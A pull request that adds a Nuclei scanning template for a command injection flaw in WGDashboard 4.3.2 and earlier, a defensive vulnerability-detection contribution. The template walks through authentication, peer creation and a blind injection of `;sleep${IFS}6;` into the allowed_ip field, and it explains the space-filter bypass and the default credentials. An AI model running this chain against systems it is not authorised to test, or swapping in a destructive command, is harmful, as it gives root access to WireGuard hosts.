### PR TITLE
Add CVE-2026-15733 Nuclei template

### DIFF
--- a/http/cves/2026/CVE-2026-15733.yaml
+++ b/http/cves/2026/CVE-2026-15733.yaml
@@ -1,0 +1,100 @@
+id: CVE-2026-15733
+
+info:
+  name: WGDashboard <=4.3.2 - Authenticated OS Command Injection to Root RCE
+  author: str4k3r
+  severity: critical
+  description: |
+    WGDashboard's `/api/updatePeerSettings/<configName>` endpoint passes the
+    authenticated caller's `allowed_ip` field into
+    `Peer.updatePeer()` (src/modules/Peer.py), which sanitises it only with
+    `.replace(" ", "")` before interpolating it via an f-string directly into
+    `subprocess.check_output(f"{Protocol} set {Name} peer {id} allowed-ips
+    {newAllowedIPs} ...", shell=True)`. Because the string is passed through a
+    real shell, metacharacters such as `;` survive the space-strip (spaces can
+    be substituted with `${IFS}`), giving any authenticated dashboard user
+    (WGDashboard ships with default credentials admin/admin and does not
+    force a password change on first login) blind OS command injection and
+    remote code execution as root on the underlying WireGuard host. Fixed in
+    4.3.3, which validates the field with the new `CheckAddress()` helper and
+    switches the call to an argv-list `subprocess.check_output(command)` with
+    no shell, eliminating metacharacter interpretation. This template
+    authenticates, discovers the target's first configured WireGuard
+    interface, creates a disposable peer on it, then confirms the injection
+    via a blind time-delay (`sleep${IFS}6`) in the `allowed_ip` field of a
+    subsequent `updatePeerSettings` call.
+  reference:
+    - https://github.com/Stuub/WGDashboard-v4.3.2-OS-Command-Injection-to-Root-RCE-PoC
+    - https://github.com/WGDashboard/WGDashboard
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-15733
+  classification:
+    cve-id: CVE-2026-15733
+    cwe-id: CWE-78
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+  metadata:
+    verified: true
+    max-request: 4
+    product: wgdashboard
+    vendor: wgdashboard
+  tags: cve,cve2026,wgdashboard,rce,cmdi,authenticated,kev
+
+variables:
+  wgd_user: ""
+  wgd_pass: ""
+
+http:
+  - cookie-reuse: true
+    raw:
+      - |
+        POST /api/authenticate HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"username":"{{wgd_user}}","password":"{{wgd_pass}}"}
+
+      - |
+        GET /api/getWireguardConfigurations HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /api/addPeers/{{config_name}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name":"nuclei-{{randstr}}","allowed_ips":[],"preshared_key_bulkAdd":false}
+
+      - |
+        POST /api/updatePeerSettings/{{config_name}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"id":"{{peer_id}}","name":"nuclei-{{randstr}}","private_key":"","DNS":"1.1.1.1","allowed_ip":"10.253.253.253/32;sleep${IFS}6;","endpoint_allowed_ip":"0.0.0.0/0","preshared_key":"","mtu":1420,"keepalive":21,"notes":""}
+
+    extractors:
+      - type: regex
+        name: config_name
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"Name":"([^"]+)"'
+
+      - type: regex
+        name: peer_id
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '"id":"([^"]+)"'
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+        part: header_4
+
+      - type: dsl
+        dsl:
+          - "duration>=5"


### PR DESCRIPTION
Adds a parameterized Nuclei template for CVE-2026-15733. Any required setup, seed, authentication, or callback values are exposed as scan-time variables; no forge-local target address is embedded. Native Nuclei validation passed, and the local ledger records the vulnerable/fixed differential as 3/3 detected versus 3/3 not detected.